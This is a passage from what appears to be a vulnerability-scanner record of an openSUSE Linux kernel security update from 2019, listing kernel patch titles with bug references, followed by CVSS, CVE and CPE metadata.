less than iommu\n agaw (bsc#1106105).\n\n - ip6mr: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - ipmi:ssif: Fix handling of multi-part return messages\n (bnc#1012382).\n\n - ip: on queued skb use skb_header_pointer instead of\n pskb_may_pull (bnc#1012382).\n\n - ip_tunnel: Fix name string concatenate in\n __ip_tunnel_create() (bnc#1012382).\n\n - ipv4: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - ipv4: ipv6: netfilter: Adjust the frag mem limit when\n truesize changes (bsc#1110286).\n\n - ipv6: Check available headroom in ip6_xmit() even\n without options (bnc#1012382).\n\n - ipv6: Consider sk_bound_dev_if when binding a socket to\n a v4 mapped address (bnc#1012382).\n\n - ipv6: explicitly initialize udp6_addr in\n udp_sock_create6() (bnc#1012382).\n\n - ipv6: fix kernel-infoleak in ipv6_local_error()\n (bnc#1012382).\n\n - ipv6: Take rcu_read_lock in __inet6_bind for mapped\n addresses (bnc#1012382).\n\n - isdn: fix kernel-infoleak in capi_unlocked_ioctl\n (bnc#1012382).\n\n - iser: set sector for ambiguous mr status errors\n (bnc#1012382).\n\n - iwlwifi: mvm: fix regulatory domain update when the\n firmware starts (bnc#1012382).\n\n - iwlwifi: mvm: support sta_statistics() even on older\n firmware (bnc#1012382).\n\n - ixgbe: Add function for checking to see if we can reuse\n page (bsc#1100105).\n\n - ixgbe: Add support for build_skb (bsc#1100105).\n\n - ixgbe: Add support for padding packet (bsc#1100105).\n\n - ixgbe: Break out Rx buffer page management\n (bsc#1100105).\n\n - ixgbe: Fix output from ixgbe_dump (bsc#1100105).\n\n - ixgbe: fix possible race in reset subtask (bsc#1101557).\n\n - ixgbe: Make use of order 1 pages and 3K buffers\n independent of FCoE (bsc#1100105).\n\n - ixgbe: Only DMA sync frame length (bsc#1100105).\n\n - ixgbe: recognize 1000BaseLX SFP modules as 1Gbps\n (bnc#1012382).\n\n - ixgbe: Refactor queue disable logic to take completion\n time into account (bsc#1101557).\n\n - ixgbe: Reorder Tx/Rx shutdown 
to reduce time needed to\n stop device (bsc#1101557).\n\n - ixgbe: Update code to better handle incrementing page\n count (bsc#1100105).\n\n - ixgbe: Update driver to make use of DMA attributes in Rx\n path (bsc#1100105).\n\n - ixgbe: Use length to determine if descriptor is done\n (bsc#1100105).\n\n - jffs2: Fix use of uninitialized delayed_work, lockdep\n breakage (bnc#1012382).\n\n - kabi: hwpoison, memory_hotplug: allow hwpoisoned pages\n to be offlined (bnc#1116336).\n\n - kabi: reorder new slabinfo fields in struct\n kmem_cache_node (bnc#1116653).\n\n - kbuild: suppress packed-not-aligned warning for default\n setting only (bnc#1012382).\n\n - kconfig: fix file name and line number of\n warn_ignored_character() (bnc#1012382).\n\n - kconfig: fix memory leak when EOF is encountered in\n quotation (bnc#1012382).\n\n - kdb: use memmove instead of overlapping memcpy\n (bnc#1012382).\n\n - kdb: Use strscpy with destination buffer size\n (bnc#1012382).\n\n - kernfs: Replace strncpy with memcpy (bnc#1012382).\n\n - kgdboc: fix KASAN global-out-of-bounds bug in\n param_set_kgdboc_var() (bnc#1012382).\n\n - kgdboc: Fix restrict error (bnc#1012382).\n\n - kgdboc: Fix warning with module build (bnc#1012382).\n\n - kobject: Replace strncpy with memcpy (bnc#1012382).\n\n - kvm/arm64: Fix caching of host MDCR_EL2 value\n (bsc#1121242).\n\n - kvm/arm: Restore banked registers and physical timer\n access on hyp_panic() (bsc#1121240).\n\n - kvm/mmu: Fix race in emulated page table writes\n (bnc#1012382).\n\n - kvm/nVMX: Eliminate vmcs02 pool (bnc#1012382).\n\n - kvm/nVMX: mark vmcs12 pages dirty on L2 exit\n (bnc#1012382).\n\n - kvm/PPC: Move and undef TRACE_INCLUDE_PATH/FILE\n (bnc#1012382).\n\n - kvm/svm: Allow direct access to MSR_IA32_SPEC_CTRL\n (bnc#1012382 bsc#1068032).\n\n - kvm/svm: Ensure an IBPB on all affected CPUs when\n freeing a vmcb (bsc#1114648).\n\n - kvm/VMX: Allow direct access to MSR_IA32_SPEC_CTRL\n (bnc#1012382 bsc#1068032 bsc#1096242 bsc#1096281).\n\n - 
kvm/VMX: Emulate MSR_IA32_ARCH_CAPABILITIES\n (bnc#1012382).\n\n - kvm/VMX: introduce alloc_loaded_vmcs (bnc#1012382).\n\n - kvm/VMX: make MSR bitmaps per-VCPU (bnc#1012382).\n\n - kvm/x86: Add IBPB support (bnc#1012382 bsc#1068032\n bsc#1068032).\n\n - kvm/x86: fix empty-body warnings (bnc#1012382).\n\n - kvm/x86: Remove indirect MSR op calls from SPEC_CTRL\n (bnc#1012382).\n\n - kvm/x86: Use jmp to invoke kvm_spurious_fault() from\n .fixup (bnc#1012382).\n\n - leds: call led_pwm_set() in leds-pwm to enforce default\n LED_OFF (bnc#1012382).\n\n - leds: leds-gpio: Fix return value check in\n create_gpio_led() (bnc#1012382).\n\n - leds: turn off the LED and wait for completion on\n unregistering LED class device (bnc#1012382).\n\n - libata: whitelist all SAMSUNG MZ7KM* solid-state disks\n (bnc#1012382).\n\n - libceph: fall back to sendmsg for slab pages\n (bsc#1118316).\n\n - libfc: sync strings with upstream versions\n (bsc#1114763).\n\n - lib/interval_tree_test.c: allow full tree search\n (bnc#1012382).\n\n - lib/interval_tree_test.c: allow users to limit scope of\n endpoint (bnc#1012382).\n\n - lib/interval_tree_test.c: make test options module\n parameters (bnc#1012382).\n\n - libnvdimm, (btt, blk): do integrity setup before\n add_disk() (bsc#1118926).\n\n - libnvdimm, dimm: fix dpa reservation vs uninitialized\n label area (bsc#1118936).\n\n - libnvdimm: fix integer overflow static analysis warning\n (bsc#1118922).\n\n - libnvdimm: fix nvdimm_bus_lock() vs device_lock()\n ordering (bsc#1118915).\n\n - lib/rbtree_test.c: make input module parameters\n (bnc#1012382).\n\n - lib/rbtree-test: lower default params (bnc#1012382).\n\n - llc: do not use sk_eat_skb() (bnc#1012382).\n\n - loop: Fix double mutex_unlock(&loop_ctl_mutex) in\n loop_control_ioctl() (bnc#1012382).\n\n - loop: Fold __loop_release into loop_release\n (bnc#1012382).\n\n - loop: Get rid of loop_index_mutex (bnc#1012382).\n\n - LSM: Check for NULL cred-security on free (bnc#1012382).\n\n - mac80211: 
Clear beacon_int in ieee80211_do_stop\n (bnc#1012382).\n\n - mac80211: fix reordering of buffered broadcast packets\n (bnc#1012382).\n\n - mac80211_hwsim: fix module init error paths for netlink\n (bnc#1012382).\n\n - mac80211_hwsim: Timer should be initialized before\n device registered (bnc#1012382).\n\n - mac80211: ignore NullFunc frames in the duplicate\n detection (bnc#1012382).\n\n - mac80211: ignore tx status for PS stations in\n ieee80211_tx_status_ext (bnc#1012382).\n\n - matroxfb: fix size of memcpy (bnc#1012382).\n\n - md: batch flush requests (bsc#1119680).\n\n - md: do not check MD_SB_CHANGE_CLEAN in md_allow_write\n (Git-fixes).\n\n - media: dvb-frontends: fix i2c access helpers for KASAN\n (bnc#1012382).\n\n - media: em28xx: Fix misplaced reset of\n dev->v4l::field_count (bnc#1012382).\n\n - media: em28xx: Fix use-after-free when disconnecting\n (bnc#1012382).\n\n - media: firewire: Fix app_info parameter type in\n avc_ca(,_app)_info (bnc#1012382).\n\n - media: vb2: be sure to unlock mutex on errors\n (bnc#1012382).\n\n - media: vb2: vb2_mmap: move lock up (bnc#1012382).\n\n - media: vivid: fix error handling of kthread_run\n (bnc#1012382).\n\n - media: vivid: free bitmap_cap when updating\n std/timings/etc (bnc#1012382).\n\n - media: vivid: set min width/height to a value > 0\n (bnc#1012382).\n\n - mfd: tps6586x: Handle interrupts on suspend\n (bnc#1012382).\n\n - mips: Align kernel load address to 64KB (bnc#1012382).\n\n - mips: Ensure pmd_present() returns false after\n pmd_mknotpresent() (bnc#1012382).\n\n - mips: fix mips_get_syscall_arg o32 check (bnc#1012382).\n\n - mips: fix n32 compat_ipc_parse_version (bnc#1012382).\n\n - mips: ralink: Fix mt7620 nd_sd pinmux (bnc#1012382).\n\n - MIPS: SiByte: Enable swiotlb for SWARM, LittleSur and\n BigSur (bnc#1012382).\n\n - misc: mic/scif: fix copy-paste error in\n scif_create_remote_lookup (bnc#1012382).\n\n - mmc: atmel-mci: do not assume idle after\n atmci_request_end (bnc#1012382).\n\n - mmc: core: 
Reset HPI enabled state during re-init and in\n case of errors (bnc#1012382).\n\n - mm: cleancache: fix corruption on missed inode\n invalidation (bnc#1012382).\n\n - MMC: OMAP: fix broken MMC on OMAP15XX/OMAP5910/OMAP310\n (bnc#1012382).\n\n - mmc: omap_hsmmc: fix DMA API warning (bnc#1012382).\n\n - mm, devm_memremap_pages: kill mapping 'System RAM'\n support (bnc#1012382).\n\n - mm: do not miss the last page because of round-off error\n (bnc#1118798).\n\n - mm, hugetlb: fix huge_pte_alloc BUG_ON (bsc#1119204).\n\n - mm: hwpoison: call shake_page() after try_to_unmap() for\n mlocked page (bnc#1116336).\n\n - mm: lower the printk loglevel for __dump_page messages\n (generic hotplug debugability).\n\n - mm, memory_hotplug: be more verbose for memory offline\n failures (generic hotplug debugability).\n\n - mm, memory_hotplug: drop pointless block alignment\n checks from __offline_pages (generic hotplug\n debugability).\n\n - mm, memory_hotplug: print reason for the offlining\n failure (generic hotplug debugability).\n\n - mm: mlock: avoid increase mm->locked_vm on mlock() when\n already mlock2(,MLOCK_ONFAULT) (bnc#1012382).\n\n - mm/nommu.c: Switch __get_user_pages_unlocked() to use\n __get_user_pages() (bnc#1012382).\n\n - mm: only report isolation failures when offlining memory\n (generic hotplug debugability).\n\n - mm/page-writeback.c: do not break integrity writeback on\n ->writepage() error (bnc#1012382).\n\n - mm: Preserve _PAGE_DEVMAP across mprotect() calls\n (bsc#1118790).\n\n - mm: print more information about mapping in __dump_page\n (generic hotplug debugability).\n\n - mm, proc: be more verbose about unstable VMA flags in\n /proc/<pid>/smaps (bnc#1012382).\n\n - mm: put_and_wait_on_page_locked() while page is migrated\n (bnc#1109272).\n\n - mm: remove write/force parameters from\n __get_user_pages_locked() (bnc#1012382 bsc#1027260).\n\n - mm: remove write/force parameters from\n __get_user_pages_unlocked() (bnc#1012382 bsc#1027260).\n\n - mm: replace 
__access_remote_vm() write parameter with\n gup_flags (bnc#1012382).\n\n - mm: replace access_remote_vm() write parameter with\n gup_flags (bnc#1012382).\n\n - mm: replace get_user_pages_locked() write/force\n parameters with gup_flags (bnc#1012382 bsc#1027260).\n\n - mm: replace get_user_pages_unlocked() write/force\n parameters with gup_flags (bnc#1012382 bsc#1027260).\n\n - mm: replace get_user_pages() write/force parameters with\n gup_flags (bnc#1012382 bsc#1027260).\n\n - mm: replace get_vaddr_frames() write/force parameters\n with gup_flags (bnc#1012382).\n\n - mm, slab: faster active and free stats (bsc#116653, VM\n Performance).\n\n - mm/slab: improve performance of gathering slabinfo stats\n (bsc#116653, VM Performance).\n\n - mm, slab: maintain total slab count instead of active\n count (bsc#116653, VM Performance).\n\n - Move patches to sorted range, p1\n\n - mv88e6060: disable hardware level MAC learning\n (bnc#1012382).\n\n - mwifiex: Fix NULL pointer dereference in skb_dequeue()\n (bnc#1012382).\n\n - mwifiex: fix p2p device does not find in scan problem\n (bnc#1012382).\n\n - namei: allow restricted O_CREAT of FIFOs and regular\n files (bnc#1012382).\n\n - neighbour: Avoid writing before skb->head in\n neigh_hh_output() (bnc#1012382).\n\n - net: 8139cp: fix a BUG triggered by changing mtu with\n network traffic (bnc#1012382).\n\n - net: amd: add missing of_node_put() (bnc#1012382).\n\n - net: bcmgenet: fix OF child-node lookup (bnc#1012382).\n\n - net: bridge: fix a bug on using a neighbour cache entry\n without checking its state (bnc#1012382).\n\n - net: call sk_dst_reset when set SO_DONTROUTE\n (bnc#1012382).\n\n - net: ena: fix crash during ena_remove() (bsc#1108240).\n\n - net: ena: update driver version from 2.0.1 to 2.0.2\n (bsc#1108240).\n\n - net: faraday: ftmac100: remove netif_running(netdev)\n check before disabling interrupts (bnc#1012382).\n\n - netfilter: nf_tables: fix oops when inserting an element\n into a verdict map 
(bnc#1012382).\n\n - net: hisilicon: remove unexpected free_netdev\n (bnc#1012382).\n\n - net/ibmvnic: Fix RTNL deadlock during device reset\n (bnc#1115431).\n\n - net: ipv4: do not handle duplicate fragments as\n overlapping (bsc#1116345).\n\n - net/mlx4_core: Correctly set PFC param if global pause\n is turned off (bsc#1015336 bsc#1015337 bsc#1015340).\n\n - net/mlx4_core: Fix uninitialized variable compilation\n warning (bnc#1012382).\n\n - net/mlx4_core: Zero out lkey field in SW2HW_MPT fw\n command (bnc#1012382).\n\n - net/mlx4: Fix UBSAN warning of signed integer overflow\n (bnc#1012382).\n\n - net: phy: do not allow __set_phy_supported to add\n unsupported modes (bnc#1012382).\n\n - net: Prevent invalid access to skb->prev in\n __qdisc_drop_all (bnc#1012382).\n\n - netrom: fix locking in nr_find_socket() (bnc#1012382).\n\n - net: speed up skb_rbtree_purge() (bnc#1012382).\n\n - net: thunderx: fix NULL pointer dereference in\n nic_remove (bnc#1012382).\n\n - nfc: nfcmrvl_uart: fix OF child-node lookup\n (bnc#1012382).\n\n - nfit: skip region registration for incomplete control\n regions (bsc#1118930).\n\n - nfsv4: Do not exit the state manager without clearing\n NFS4CLNT_MANAGER_RUNNING (git-fixes).\n\n - nvme: validate controller state before rescheduling keep\n alive (bsc#1103257).\n\n - ocfs2: fix deadlock caused by ocfs2_defrag_extent()\n (bnc#1012382).\n\n - ocfs2: fix panic due to unrecovered local alloc\n (bnc#1012382).\n\n - ocfs2: fix potential use after free (bnc#1012382).\n\n - of: add helper to lookup compatible child node\n (bnc#1012382).\n\n - omap2fb: Fix stack memory disclosure (bsc#1106929)\n\n - packet: Do not leak dev refcounts on error exit\n (bnc#1012382).\n\n - packet: validate address length (bnc#1012382).\n\n - packet: validate address length if non-zero\n (bnc#1012382).\n\n - pci: altera: Check link status before retrain link\n (bnc#1012382).\n\n - pci: altera: Fix altera_pcie_link_is_up() (bnc#1012382).\n\n - pci: altera: Move 
retrain from fixup to\n altera_pcie_host_init() (bnc#1012382).\n\n - pci: altera: Poll for link training status after\n retraining the link (bnc#1012382).\n\n - pci: altera: Poll for link up status after retraining\n the link (bnc#1012382).\n\n - pci: altera: Reorder read/write functions (bnc#1012382).\n\n - pci: altera: Rework config accessors for use without a\n struct pci_bus (bnc#1012382).\n\n - perf/bpf: Convert perf_event_array to use struct file\n (bsc#1119967).\n\n - perf intel-pt: Fix error with config term 'pt=0'\n (bnc#1012382).\n\n - perf parse-events: Fix unchecked usage of strncpy()\n (bnc#1012382).\n\n - perf pmu: Suppress potential format-truncation warning\n (bnc#1012382).\n\n - perf svghelper: Fix unchecked usage of strncpy()\n (bnc#1012382).\n\n - pinctrl: sunxi: a83t: Fix IRQ offset typo for PH11\n (bnc#1012382).\n\n - platform/x86: asus-wmi: Tell the EC the OS will handle\n the display off hotkey (bnc#1012382).\n\n - powerpc/64s: consolidate MCE counter increment\n (bsc#1094244).\n\n - powerpc/boot: Fix random libfdt related build errors\n (bnc#1012382).\n\n - powerpc/boot: Request no dynamic linker for boot wrapper\n (bsc#1070805).\n\n - powerpc/cacheinfo: Report the correct shared_cpu_map on\n big-cores (bsc#1109695).\n\n - powerpc: Detect the presence of big-cores via 'ibm,\n thread-groups' (bsc#1109695).\n\n - powerpc: Fix COFF zImage booting on old powermacs\n (bnc#1012382).\n\n - powerpc, hotplug: Avoid to touch non-existent cpumasks\n (bsc#1109695).\n\n - powerpc: make use of for_each_node_by_type() instead of\n open-coding it (bsc#1109695).\n\n - powerpc/msi: Fix NULL pointer access in teardown code\n (bnc#1012382).\n\n - powerpc/numa: Suppress 'VPHN is not supported' messages\n (bnc#1012382).\n\n - powerpc/pseries/cpuidle: Fix preempt warning\n (bnc#1012382).\n\n - powerpc/setup: Add cpu_to_phys_id array (bsc#1109695).\n\n - powerpc/smp: Add cpu_l2_cache_map (bsc#1109695).\n\n - powerpc/smp: Add Power9 scheduler topology\n 
(bsc#1109695).\n\n - powerpc/smp: Rework CPU topology construction\n (bsc#1109695).\n\n - powerpc/smp: Use cpu_to_chip_id() to find core siblings\n (bsc#1109695).\n\n - powerpc/traps: restore recoverability of machine_check\n interrupts (bsc#1094244).\n\n - powerpc: Use cpu_smallcore_sibling_mask at SMT level on\n bigcores (bsc#1109695).\n\n - powerpc/xmon: Fix invocation inside lock region\n (bsc#1122885).\n\n - power: supply: olpc_battery: correct the temperature\n units (bnc#1012382).\n\n - proc: Remove empty line in /proc/self/status\n (bnc#1012382 bsc#1094823).\n\n - pstore: Convert console write to use ->write_buf\n (bnc#1012382).\n\n - pstore/ram: Do not treat empty buffers as valid\n (bnc#1012382).\n\n - qed: Fix bitmap_weight() check (bsc#1019695).\n\n - qed: Fix PTT leak in qed_drain() (bnc#1012382).\n\n - qed: Fix QM getters to always return a valid pq\n (bsc#1019695 ).\n\n - qed: Fix reading wrong value in loop condition\n (bnc#1012382).\n\n - r8169: Add support for new Realtek Ethernet\n (bnc#1012382).\n\n - rapidio/rionet: do not free skb before reading its\n length (bnc#1012382).\n\n - Refresh\n patches.kabi/x86-cpufeature-preserve-numbers.patch.\n (bsc#1122651)\n\n - Revert 'drm/rockchip: Allow driver to be shutdown on\n reboot/kexec' (bsc#1106929)\n\n - Revert 'exec: avoid gcc-8 warning for get_task_comm'\n (kabi).\n\n - Revert 'iommu/io-pgtable-arm: Check for v7s-incapable\n systems' (bsc#1106105).\n\n - Revert 'PCI/ASPM: Do not initialize link state when\n aspm_disabled is set' (bsc#1106105).\n\n - Revert 'usb: musb: musb_host: Enable HCD_BH flag to\n handle urb return in bottom half' (bsc#1047487).\n\n - Revert 'wlcore: Add missing PM call for\n wlcore_cmd_wait_for_event_or_timeout()' (bnc#1012382).\n\n - rocker: fix rocker_tlv_put_* functions for KASAN\n (bnc#1012382).\n\n - rtc: snvs: add a missing write sync (bnc#1012382).\n\n - rtc: snvs: Add timeouts to avoid kernel lockups\n (bnc#1012382).\n\n - rtnetlink: ndo_dflt_fdb_dump() only work 
for\n ARPHRD_ETHER devices (bnc#1012382).\n\n - s390/cpum_cf: Reject request for sampling in event\n initialization (bnc#1012382).\n\n - s390/mm: Check for valid vma before zapping in\n gmap_discard (bnc#1012382).\n\n - s390/qeth: fix length check in SNMP processing\n (bnc#1012382).\n\n - sbus: char: add of_node_put() (bnc#1012382).\n\n - scsi: bfa: convert to strlcpy/strlcat (bnc#1012382\n bsc#1019683, ).\n\n - scsi: bnx2fc: Fix NULL dereference in error handling\n (bnc#1012382).\n\n - scsi: Create two versions of\n scsi_internal_device_unblock() (bsc#1119877).\n\n - scsi: csiostor: Avoid content leaks and casts\n (bnc#1012382).\n\n - scsi: Introduce scsi_start_queue() (bsc#1119877).\n\n - scsi: libiscsi: Fix NULL pointer dereference in\n iscsi_eh_session_reset (bnc#1012382).\n\n - scsi: lpfc: Add Buffer overflow check, when nvme_info\n larger than PAGE_SIZE (bsc#1102660).\n\n - scsi: lpfc: devloss timeout race condition caused NULL\n pointer reference (bsc#1102660).\n\n - scsi: lpfc: Fix abort error path for NVMET\n (bsc#1102660).\n\n - scsi: lpfc: fix block guard enablement on SLI3 adapters\n (bsc#1079935).\n\n - scsi: lpfc: Fix driver crash when re-registering NVME\n rports (bsc#1102660).\n\n - scsi: lpfc: Fix ELS abort on SLI-3 adapters\n (bsc#1102660).\n\n - scsi: lpfc: Fix list corruption on the completion queue\n (bsc#1102660).\n\n - scsi: lpfc: Fix NVME Target crash in defer rcv logic\n (bsc#1102660).\n\n - scsi: lpfc: Fix panic if driver unloaded when port is\n offline (bsc#1102660).\n\n - scsi: lpfc: update driver version to 11.4.0.7-5\n (bsc#1102660).\n\n - scsi: Make __scsi_remove_device go straight from BLOCKED\n to DEL (bsc#1119877).\n\n - scsi: megaraid: fix out-of-bound array accesses\n (bnc#1012382).\n\n - scsi: Protect SCSI device state changes with a mutex\n (bsc#1119877).\n\n - scsi: qedi: Add ISCSI_BOOT_SYSFS to Kconfig\n (bsc#1043083).\n\n - scsi: Re-export scsi_internal_device_(,un)_block()\n (bsc#1119877).\n\n - scsi: sd: Fix 
cache_type_store() (bnc#1012382).\n\n - scsi: Split scsi_internal_device_block() (bsc#1119877).\n\n - scsi: target: add emulate_pr backstore attr to toggle PR\n support (bsc#1091405).\n\n - scsi: target: drop unused pi_prot_format attribute\n storage (bsc#1091405).\n\n - scsi: target: use consistent left-aligned ASCII INQUIRY\n data (bnc#1012382).\n\n - scsi: ufs: fix bugs related to NULL pointer access and\n array size (bnc#1012382).\n\n - scsi: ufs: fix race between clock gating and devfreq\n scaling work (bnc#1012382).\n\n - scsi: ufshcd: Fix race between clk scaling and ungate\n work (bnc#1012382).\n\n - scsi: ufshcd: release resources if probe fails\n (bnc#1012382).\n\n - scsi: use 'inquiry_mutex' instead of 'state_mutex'\n (bsc#1119877).\n\n - scsi: vmw_pscsi: Rearrange code to avoid multiple calls\n to free_irq during unload (bnc#1012382).\n\n - scsi: zfcp: fix posting too many status read buffers\n leading to adapter shutdown (bnc#1012382).\n\n - sctp: allocate sctp_sockaddr_entry with kzalloc\n (bnc#1012382).\n\n - sctp: clear the transport of some out_chunk_list chunks\n in sctp_assoc_rm_peer (bnc#1012382).\n\n - sctp: initialize sin6_flowinfo for ipv6 addrs in\n sctp_inet6addr_event (bnc#1012382).\n\n - selftests: Move networking/timestamping from\n Documentation (bnc#1012382).\n\n - selinux: fix GPF on invalid policy (bnc#1012382).\n\n - seq_file: fix incomplete reset on read from zero offset\n (Git-fixes).\n\n - series.conf: Move\n 'patches.fixes/aio-hold-an-extra-file-reference-over-AIO\n -read-write.patch' into sorted section.\n\n - slab: alien caches must not be initialized if the\n allocation of the alien cache failed (bnc#1012382).\n\n - sock: Make sock->sk_stamp thread-safe (bnc#1012382).\n\n - spi: bcm2835: Avoid finishing transfer prematurely in\n IRQ mode (bnc#1012382).\n\n - spi: bcm2835: Fix book-keeping of DMA termination\n (bnc#1012382).\n\n - spi: bcm2835: Fix race on DMA termination (bnc#1012382).\n\n - spi: bcm2835: Unbreak the build of 
esoteric configs\n (bnc#1012382).\n\n - sr: pass down correctly sized SCSI sense buffer\n (bnc#1012382).\n\n - Staging: lustre: remove two build warnings\n (bnc#1012382).\n\n - staging: rts5208: fix gcc-8 logic error warning\n (bnc#1012382).\n\n - staging: speakup: Replace strncpy with memcpy\n (bnc#1012382).\n\n - sunrpc: Fix a bogus get/put in generic_key_to_expire()\n (bnc#1012382).\n\n - sunrpc: Fix a potential race in xprt_connect()\n (git-fixes).\n\n - sunrpc: fix cache_head leak due to queued request\n (bnc#1012382).\n\n - sunrpc: Fix leak of krb5p encode pages (bnc#1012382).\n\n - sunrpc: handle ENOMEM in rpcb_getport_async\n (bnc#1012382).\n\n - swiotlb: clean up reporting (bnc#1012382).\n\n - sysfs: Disable lockdep for driver bind/unbind files\n (bnc#1012382).\n\n - sysv: return 'err' instead of 0 in __sysv_write_inode\n (bnc#1012382).\n\n - target/iscsi: avoid NULL dereference in CHAP auth error\n path (bsc#1117165).\n\n - target: se_dev_attrib.emulate_pr ABI stability\n (bsc#1091405).\n\n - tcp: fix NULL ref in tail loss probe (bnc#1012382).\n\n - timer/debug: Change /proc/timer_list from 0444 to 0400\n (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_bearer_enable\n (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_doit\n (bnc#1012382).\n\n - tipc: fix uninit-value in\n tipc_nl_compat_link_reset_stats (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_link_set\n (bnc#1012382).\n\n - tipc: fix uninit-value in tipc_nl_compat_name_table_dump\n (bnc#1012382).\n\n - tmpfs: make lseek(SEEK_DATA/SEK_HOLE) return ENXIO with\n a negative offset (bnc#1012382).\n\n - tpm: fix response size validation in tpm_get_random()\n (bsc#1020645, git-fixes).\n\n - tracing: Fix bad use of igrab in trace_uprobe.c\n (bsc#1120046).\n\n - tracing: Fix memory leak in set_trigger_filter()\n (bnc#1012382).\n\n - tracing: Fix memory leak of instance function hash\n filters (bnc#1012382).\n\n - tty/ldsem: Wake up readers after timed out 
down_write()\n (bnc#1012382).\n\n - tty: serial: 8250_mtk: always resume the device in probe\n (bnc#1012382).\n\n - tty: wipe buffer (bnc#1012382).\n\n - tty: wipe buffer if not echoing data (bnc#1012382).\n\n - tun: forbid iface creation with rtnl ops (bnc#1012382).\n\n - unifdef: use memcpy instead of strncpy (bnc#1012382).\n\n - Update config files: disable f2fs in the rest configs\n (boo#1109665)\n\n - uprobes: Fix handle_swbp() vs. unregister() + register()\n race once more (bnc#1012382).\n\n - usb: Add USB_QUIRK_DELAY_CTRL_MSG quirk for Corsair K70\n RGB (bnc#1012382).\n\n - usb: appledisplay: Add 27' Apple Cinema Display\n (bnc#1012382).\n\n - usb: cdc-acm: send ZLP for Telit 3G Intel based modems\n (bnc#1012382).\n\n - usb: check usb_get_extra_descriptor for proper size\n (bnc#1012382).\n\n - usb: core: Fix hub port connection events lost\n (bnc#1012382).\n\n - usb: core: quirks: add RESET_RESUME quirk for Cherry\n G230 Stream series (bnc#1012382).\n\n - usb: gadget: dummy: fix nonsensical comparisons\n (bnc#1012382).\n\n - usbnet: ipheth: fix potential recvmsg bug and recvmsg\n bug 2 (bnc#1012382).\n\n - usb: omap_udc: fix crashes on probe error and module\n removal (bnc#1012382).\n\n - usb: omap_udc: fix omap_udc_start() on 15xx machines\n (bnc#1012382).\n\n - usb: omap_udc: fix USB gadget functionality on Palm\n Tungsten E (bnc#1012382).\n\n - usb: omap_udc: use devm_request_irq() (bnc#1012382).\n\n - usb: quirk: add no-LPM quirk on SanDisk Ultra Flair\n device (bnc#1012382).\n\n - usb: r8a66597: Fix a possible concurrency use-after-free\n bug in r8a66597_endpoint_disable() (bnc#1012382).\n\n - usb: serial: option: add Fibocom NL668 series\n (bnc#1012382).\n\n - usb: serial: option: add Fibocom NL678 series\n (bnc#1012382).\n\n - usb: serial: option: add GosunCn ZTE WeLink ME3630\n (bnc#1012382).\n\n - usb: serial: option: add HP lt4132 (bnc#1012382).\n\n - usb: serial: option: add Simcom SIM7500/SIM7600 (MBIM\n mode) (bnc#1012382).\n\n - usb: serial: 
option: add Telit LN940 series\n (bnc#1012382).\n\n - usb: serial: pl2303: add ids for Hewlett-Packard HP POS\n pole displays (bnc#1012382).\n\n - usb: storage: add quirk for SMI SM3350 (bnc#1012382).\n\n - usb: storage: do not insert sane sense for SPC3+ when\n bad sense specified (bnc#1012382).\n\n - usb: usb-storage: Add new IDs to ums-realtek\n (bnc#1012382).\n\n - usb: xhci: fix timeout for transition from RExit to U0\n (bnc#1012382).\n\n - usb: xhci: fix uninitialized completion when USB3 port\n got wrong status (bnc#1012382).\n\n - usb: xhci: Prevent bus suspend if a port connect change\n or polling state is detected (bnc#1012382).\n\n - v9fs_dir_readdir: fix double-free on p9stat_read error\n (bnc#1012382).\n\n - vfs: Avoid softlockups in drop_pagecache_sb()\n (bsc#1118505).\n\n - vhost: make sure used idx is seen before log in\n vhost_add_used_n() (bnc#1012382).\n\n - virtio/s390: avoid race on vcdev->config (bnc#1012382).\n\n - virtio/s390: fix race in ccw_io_helper() (bnc#1012382).\n\n - VSOCK: Send reset control packet when socket is\n partially bound (bnc#1012382).\n\n - writeback: do not decrement wb->refcnt if !wb->bdi (git\n fixes (writeback)).\n\n - x86/earlyprintk/efi: Fix infinite loop on some screen\n widths (bnc#1012382).\n\n - x86/entry: spell EBX register correctly in documentation\n (bnc#1012382).\n\n - x86/MCE: Export memory_error() (bsc#1114648).\n\n - x86/MCE: Make correctable error detection look at the\n Deferred bit (bsc#1114648).\n\n - x86/mtrr: Do not copy uninitialized gentry fields back\n to userspace (bnc#1012382).\n\n - x86/speculation/l1tf: Drop the swap storage limit\n restriction when l1tf=off (bnc#1114871).\n\n - x86/speculation: Use synthetic bits for IBRS/IBPB/STIBP\n (bnc#1012382).\n\n - xen/balloon: Support xend-based toolstack (bnc#1065600).\n\n - xen/netback: dont overflow meta array (bnc#1099523).\n\n - xen/netfront: tolerate frags with no data (bnc#1012382).\n\n - xen/x86: add diagnostic printout to xen_mc_flush() 
in\n case of error (bnc#1116183).\n\n - xen: xlate_mmu: add missing header to fix 'W=1' warning\n (bnc#1012382).\n\n - xfrm: Fix bucket count reported to userspace\n (bnc#1012382).\n\n - xfs: Align compat attrlist_by_handle with native\n implementation (git-fixes).\n\n - xfs: fix quotacheck dquot id overflow infinite loop\n (bsc#1121621).\n\n - xhci: Add quirk to workaround the errata seen on Cavium\n Thunder-X2 Soc (bsc#1117162).\n\n - xhci: Do not prevent USB2 bus suspend in state check\n intended for USB3 only (bnc#1012382).\n\n - xhci: Prevent U1/U2 link pm states if exit latency is\n too long (bnc#1012382).\n\n - xprtrdma: Reset credit grant properly after a disconnect\n (git-fixes).\n\n - xtensa: enable coprocessors that are being flushed\n (bnc#1012382).\n\n - xtensa: fix coprocessor context offset definitions\n (bnc#1012382).\n\n - Yama: Check for pid death before checking ancestry\n (bnc#1012382).\n\n - x86/pkeys: Properly copy pkey state at fork()\n (bsc#1106105).", "edition": 12, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-2019-140)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-3460", "CVE-2018-9568", "CVE-2018-19824", "CVE-2018-16862", "CVE-2018-1120", "CVE-2018-16884", "CVE-2019-3459", "CVE-2018-19407", "CVE-2018-20169", "CVE-2018-19985"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", 